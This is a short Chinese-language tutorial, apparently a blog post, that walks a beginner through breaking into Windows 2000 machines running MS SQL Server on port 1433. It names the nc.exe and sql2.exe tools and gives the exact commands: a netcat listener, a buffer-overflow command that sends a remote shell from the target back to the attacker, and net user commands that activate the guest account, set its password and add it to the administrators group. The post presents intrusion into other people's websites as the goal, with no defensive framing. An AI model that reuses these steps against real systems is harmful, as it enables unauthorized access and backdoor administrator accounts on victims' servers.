本文介绍了一种通过1433端口进行SQL溢出攻击的方法,利用nc.exe和sql2.exe工具实现远程入侵,并详细说明了获取目标IP地址及实施攻击的具体步骤。
在win2000机器上装了mssql的话,机器就会开1433端口。什么是端口,就像食堂买菜的窗口一样,你买白菜上1号窗,买西红柿上2号窗。在机器上买mssql就上1433窗。
溢出1433需要两个工具:nc.exe和sql2.exe,在www.sandflee.net都有下载。进攻方法就两步:
第一步,在自己机器上开一个cmd窗口。对了,你要用win2000的话,就开始-运行-写入cmd回车。这里我们只用2000,不说98。如果你把你下的nc.exe和sql2.exe和我习惯一样放在c:盘的话,就在你开的这个窗口下打入命令c:>nc -l -p 40回车。这步的意思是用nc这个工具开一个40的端口监听。
第二步:再在开始-运行-写入cmd回车,再开一个窗口。在这个窗口写命令行c:>sql2.exe 你要入侵网站的ip 自己的ip 40 0回车。这里要作点说明:如何得到入侵网站ip?在cmd下c:>ping www.xxxxx.com就可以看到了。自己的ip呢?在cmd下c:>ipconfig就可以看到了。其中命令行中的40你可以随意改成别的,但好像40和53成功率高一点。再是命令中的0不行的话,你就试试1或2。如果入侵网站有这个漏洞话,那么你开的第一个窗口就会变成肉鸡的c:/winnt/system32>.就是说,你已经进入它的机器里了。进去以后,你可以填加个用户了。net user guest /active:yes用这个命令,就将默认禁止的guest用户激活。net user guest 123456这样guest的密码变成123456了。net localgroup administrators guest /add这就是guest成为最高权限的管理员了。
扫一扫
4103
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
